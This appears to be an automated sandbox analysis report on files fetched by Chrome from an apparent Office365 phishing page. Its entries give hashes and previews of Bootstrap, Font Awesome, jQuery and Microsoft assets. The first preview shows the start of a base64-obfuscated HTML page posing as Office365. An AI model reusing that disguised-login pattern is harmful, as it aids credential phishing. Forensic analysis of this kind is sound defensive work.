                                                                      Preview:<!DOCTYPE html>..<script>....var X="CjxIVE1MIGxhbmc9ZW4+PEhFQUQ+PFRJVExFPk9mZmljZTM2NTwvVElUTEU+CjxTQ1JJUFQgc3JjPSJodHRwczovL2FqYXguZ29vZ2xlYXBpcy5jb20vYWpheC9saWJzL2pxdWVyeS8yLjIuNC9qcXVlcnkubWluLmpzIj48L1NDUklQVD4KCjxTQ1JJUFQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy4xLjEubWluLmpzIj4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy4zLjEuanMiIGludGVncml0eT0ic2hhMjU2LTJLb2s3TWJPeXhwZ1VWdkFrL0hKMmppZ09TWVMyYXVLNFBmemJtN3VINjA9IiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIj48L1NDUklQVD4KPCEtLSBSZXF1aXJlZCBtZXRhIHRhZ3MgLS0+CjxNRVRBIGNoYXJzZXQ9dXRmLTg+CjxNRVRBIG5hbWU9dmlld3BvcnQgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPjwhLS0gQm9vdHN0cmFwIENTUyAtLT48TElOSyByZWw9c3R5bGVzaGVldCBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC80LjAuMC9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIGludGVncml0eT0ic2hhMzg0LUduNTM4NHhxUTFhb1dYQSswNThSWFB4UGc2Znk0SVd2VE5oMEUyNjNYbUZjSmxTQXdpR2dGQVcvZEFpUzZKWG0iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjxMSU5LIHJlbD1z
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 2529 x 1350, 8-bit/color RGBA, non-interlaced
                                                                      Category:downloaded
                                                                      Size (bytes):372780
                                                                      Entropy (8bit):7.936675913286942
                                                                      Encrypted:false
                                                                      SSDEEP:6144:kEpSY014FeRindWo3cxD1yUQplpQvpZUkWLlsXZh5ItQbIWpL47Ajfq8:kEp6iBndW6c5PQplpGpZUvLyh5WQbLpn
                                                                      MD5:214D89A26F0AC918A09F216A1B0F97B4
                                                                      SHA1:7CC487398C1C249DB2C2BAD323034DADD0EC14C0
                                                                      SHA-256:318E36178AF3CBC9C9FCEB6FCE191D42483EC70C528B1C600E2C38C72A111637
                                                                      SHA-512:AB663638F91A00DB9A31CB7D3B2B2C63AA5E5E2A0C8F359CB51E0F72E89F0DC80AD4429A7C846F8C28A80775173C6CCF745A89DABE20012DFDD35CC75DD91578
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://i.gyazo.com/214d89a26f0ac918a09f216a1b0f97b4.png
                                                                      Preview:.PNG........IHDR.......F.............sRGB.........gAMA......a.....pHYs.........].......IDATx^..`\.....`Y...........m.BJiSn.r...'.38d......%Y.....>{.^.,.....of..9so.^7.xJ.!..B.!...*8.=PJ<|m.Hc......lc{D.!.%..y[d..c.G..B.!..B.i.P.G.!..B.!.."N.t.r7O.#..{.......B.i.|...>.e{D.!..B.!....Ex..B.!..B.!..B.!..B.!..BH=q..K.!..B.!..B.!..B.!..B.!..:B..!..B.!..B.!..B.!..B.!..RO(.#..B.!..B.!..B.!..B.!..B..Ex..B.!..B.!..B.!..B.!..BH=....B.!..B.!..B.!..B.!..B..'...B.!..B.!..B.!..B.!..B.!.."<B.!..B.!..B.!..B.!..B.!....u..l..B.!..B.!M.........!..B.!..e....,..B.!..B.Ex..B.!..B...].W..m..!..B..|....r.+,..B.!..B.LGK.!..B.!..B.!..B.!..B.!...F.#..B.!...l`$<B.!...T`$<B.!....!Dzu....>.....,i.dd...#'e....g.!.P.G.!..B.!..@..!..B.i*P.G.!....Ce..X..v.6m(.kn.......k.d.........4......E.}dd.h..;Z..Jh....x.....M......+.....U .....;S...B)..4N...!..B.!..Ex..B.!..@..!..R....M:F..+#.5kR2.d...G......\V..!$.[.....c.J..P),)...r)-....*..<%U.`&.;4.\....x........#.9..C.dS..g.JAq.'f.!..B..'-M.WUuJ.=8..D'.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                      Category:dropped
                                                                      Size (bytes):1435
                                                                      Entropy (8bit):7.8613342322590265
                                                                      Encrypted:false
                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (50758)
                                                                      Category:downloaded
                                                                      Size (bytes):51039
                                                                      Entropy (8bit):5.247253437401007
                                                                      Encrypted:false
                                                                      SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                      MD5:67176C242E1BDC20603C878DEE836DF3
                                                                      SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                      SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                      SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                      Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (60130)
                                                                      Category:dropped
                                                                      Size (bytes):60312
                                                                      Entropy (8bit):4.72859504417617
                                                                      Encrypted:false
                                                                      SSDEEP:768:PUh31IPiyXNq4YxBowbgJlkwF//zMQyYJYX9Bf7VSz8:PU0PxXE4YXJgndFTfy9lQQ
                                                                      MD5:A12EC7EBE75A4D59A5DD6B79E2BA2E16
                                                                      SHA1:28F5DCC595EE6D4163481EF64170180502C8629B
                                                                      SHA-256:FC5128DFDCDFA0C3A9967A6D2F19399D7BF1AAAE6AD7571B96B03915A1F30DDA
                                                                      SHA-512:28B9EA5F3F95807259C2745162424ACEECAC2556BC1AB9A3B33E4E15B54C6970A4DF4A5892FE83C1155C82CA8D93AEBB173BE32F1A7F8B9D3CE038B2DD1E6FFE
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pul
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (60130)
                                                                      Category:downloaded
                                                                      Size (bytes):60312
                                                                      Entropy (8bit):4.72859504417617
                                                                      Encrypted:false
                                                                      SSDEEP:768:PUh31IPiyXNq4YxBowbgJlkwF//zMQyYJYX9Bf7VSz8:PU0PxXE4YXJgndFTfy9lQQ
                                                                      MD5:A12EC7EBE75A4D59A5DD6B79E2BA2E16
                                                                      SHA1:28F5DCC595EE6D4163481EF64170180502C8629B
                                                                      SHA-256:FC5128DFDCDFA0C3A9967A6D2F19399D7BF1AAAE6AD7571B96B03915A1F30DDA
                                                                      SHA-512:28B9EA5F3F95807259C2745162424ACEECAC2556BC1AB9A3B33E4E15B54C6970A4DF4A5892FE83C1155C82CA8D93AEBB173BE32F1A7F8B9D3CE038B2DD1E6FFE
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://kit-free.fontawesome.com/releases/latest/css/free.min.css
                                                                      Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pul
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (26500)
                                                                      Category:downloaded
                                                                      Size (bytes):26682
                                                                      Entropy (8bit):4.82962335901065
                                                                      Encrypted:false
                                                                      SSDEEP:192:kP6hT1bIl4w0QUmQ10PwKLaAu5CwWavpHo4O6wgLPhJVR8XD7mycP:Phal4w0QK+PwK05eavpmgP1eXD7mycP
                                                                      MD5:76F34B71FC9FB641507FF6A822CC07F5
                                                                      SHA1:73ED2F8F21CD40FB496E61306ACBB5849D4DBFF4
                                                                      SHA-256:6DEA47458A4CD7CD7312CC780A53C62E0C8B3CCC8D0B13C1AC0EA6E3DFCECEA8
                                                                      SHA-512:6C4002CE78247B50BFA835A098980AF340E4E9F05F7097C1E83301289051CE1282E647ABAB87DB28A32FBFE0263C7318D2444B7D57875873908D6D5ED2AF882F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://kit-free.fontawesome.com/releases/latest/css/free-v4-shims.min.css
                                                                      Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa.fa-glass:before{content:"\f000"}.fa.fa-meetup{font-family:"Font Awesome 5 Brands";font-weight:400}.fa.fa-star-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-file-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arrow-circle-o-down:before{content:"\f358"}.fa.fa-arrow-circle-o-up{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arro
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (26500)
                                                                      Category:dropped
                                                                      Size (bytes):26682
                                                                      Entropy (8bit):4.82962335901065
                                                                      Encrypted:false
                                                                      SSDEEP:192:kP6hT1bIl4w0QUmQ10PwKLaAu5CwWavpHo4O6wgLPhJVR8XD7mycP:Phal4w0QK+PwK05eavpmgP1eXD7mycP
                                                                      MD5:76F34B71FC9FB641507FF6A822CC07F5
                                                                      SHA1:73ED2F8F21CD40FB496E61306ACBB5849D4DBFF4
                                                                      SHA-256:6DEA47458A4CD7CD7312CC780A53C62E0C8B3CCC8D0B13C1AC0EA6E3DFCECEA8
                                                                      SHA-512:6C4002CE78247B50BFA835A098980AF340E4E9F05F7097C1E83301289051CE1282E647ABAB87DB28A32FBFE0263C7318D2444B7D57875873908D6D5ED2AF882F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa.fa-glass:before{content:"\f000"}.fa.fa-meetup{font-family:"Font Awesome 5 Brands";font-weight:400}.fa.fa-star-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-file-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arrow-circle-o-down:before{content:"\f358"}.fa.fa-arrow-circle-o-up{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arro
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):28
                                                                      Entropy (8bit):4.137537511266052
                                                                      Encrypted:false
                                                                      SSDEEP:3:G4iCFCR:ziC4R
                                                                      MD5:AC2ACA9EAA84E1DEADB8507B24896865
                                                                      SHA1:39FEEC029B369917D2897C95FD450FF9EA64D08F
                                                                      SHA-256:881851041A64BE06D8BAFCFD2D1DD85F071FCD755178B529420DC5858141EF44
                                                                      SHA-512:A5389EDD199E38F65D350C560C8AC85545321FC4F169841F29F55CE3293C0C7454D38A709942235A3010EAAB91B99758CD5350629331AB0286BADBC9E4BFAD65
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmcusxpHxb12xIFDVNVgbUSBQ2MV9u3?alt=proto
                                                                      Preview:ChIKBw1TVYG1GgAKBw2MV9u3GgA=
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):72
                                                                      Entropy (8bit):4.241202481433726
                                                                      Encrypted:false
                                                                      SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                      MD5:9E576E34B18E986347909C29AE6A82C6
                                                                      SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                      SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                      SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (48664)
                                                                      Category:downloaded
                                                                      Size (bytes):48944
                                                                      Entropy (8bit):5.272507874206726
                                                                      Encrypted:false
                                                                      SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                      MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                      SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                      SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                      SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                      Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                      Category:downloaded
                                                                      Size (bytes):1435
                                                                      Entropy (8bit):7.8613342322590265
                                                                      Encrypted:false
                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (26500)
                                                                      Category:downloaded
                                                                      Size (bytes):26682
                                                                      Entropy (8bit):4.82962335901065
                                                                      Encrypted:false
                                                                      SSDEEP:192:kP6hT1bIl4w0QUmQ10PwKLaAu5CwWavpHo4O6wgLPhJVR8XD7mycP:Phal4w0QK+PwK05eavpmgP1eXD7mycP
                                                                      MD5:76F34B71FC9FB641507FF6A822CC07F5
                                                                      SHA1:73ED2F8F21CD40FB496E61306ACBB5849D4DBFF4
                                                                      SHA-256:6DEA47458A4CD7CD7312CC780A53C62E0C8B3CCC8D0B13C1AC0EA6E3DFCECEA8
                                                                      SHA-512:6C4002CE78247B50BFA835A098980AF340E4E9F05F7097C1E83301289051CE1282E647ABAB87DB28A32FBFE0263C7318D2444B7D57875873908D6D5ED2AF882F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://ka-f.fontawesome.com/releases/v5.15.4/css/free-v4-shims.min.css?token=585b051251
                                                                      Preview:/*!. * Font Awesome Free 5.15.4 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */.fa.fa-glass:before{content:"\f000"}.fa.fa-meetup{font-family:"Font Awesome 5 Brands";font-weight:400}.fa.fa-star-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-file-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arrow-circle-o-down:before{content:"\f358"}.fa.fa-arrow-circle-o-up{font-family:"Font Awesome 5 Free";font-weight:400}.fa.fa-arro
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (32012)
                                                                      Category:downloaded
                                                                      Size (bytes):69597
                                                                      Entropy (8bit):5.369216080582935
                                                                      Encrypted:false
                                                                      SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                      MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                      SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                      SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                      SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                      Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 609687
                                                                      Category:downloaded
                                                                      Size (bytes):161868
                                                                      Entropy (8bit):7.998343832125457
                                                                      Encrypted:true
                                                                      SSDEEP:3072:vr9FDFBLO2HEdL0AmdYwH8JmJnvFcPBdKEhqG9N5m9jJcvy7fu3l/+5aNI:ZXBS2HOL0Ax3wNEvF5oNco645aNI
                                                                      MD5:0D694A88E8387D33284F48CA9DBCDAFA
                                                                      SHA1:E0D4F4B4382F7166E869F0AB9CD31F176B81C805
                                                                      SHA-256:339FAF6103F336CD431D5ACE271301E2D18BA9D9B7516D65B9DD7EA1F71107EC
                                                                      SHA-512:4B3395006874C1DF2D251E8F00C5180FF293B9EA3A0B1317E7DC4F9AFAFF655E9A8F9F8DB6B9A46B25E0C5007E561F6CA919736E60D1182D622C002A44807162
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://logincdn.msauth.net/shared/5/js/reset-password-signinname_en-gb_iZI2yUEfCC-lRD6VZZLIBA2.js
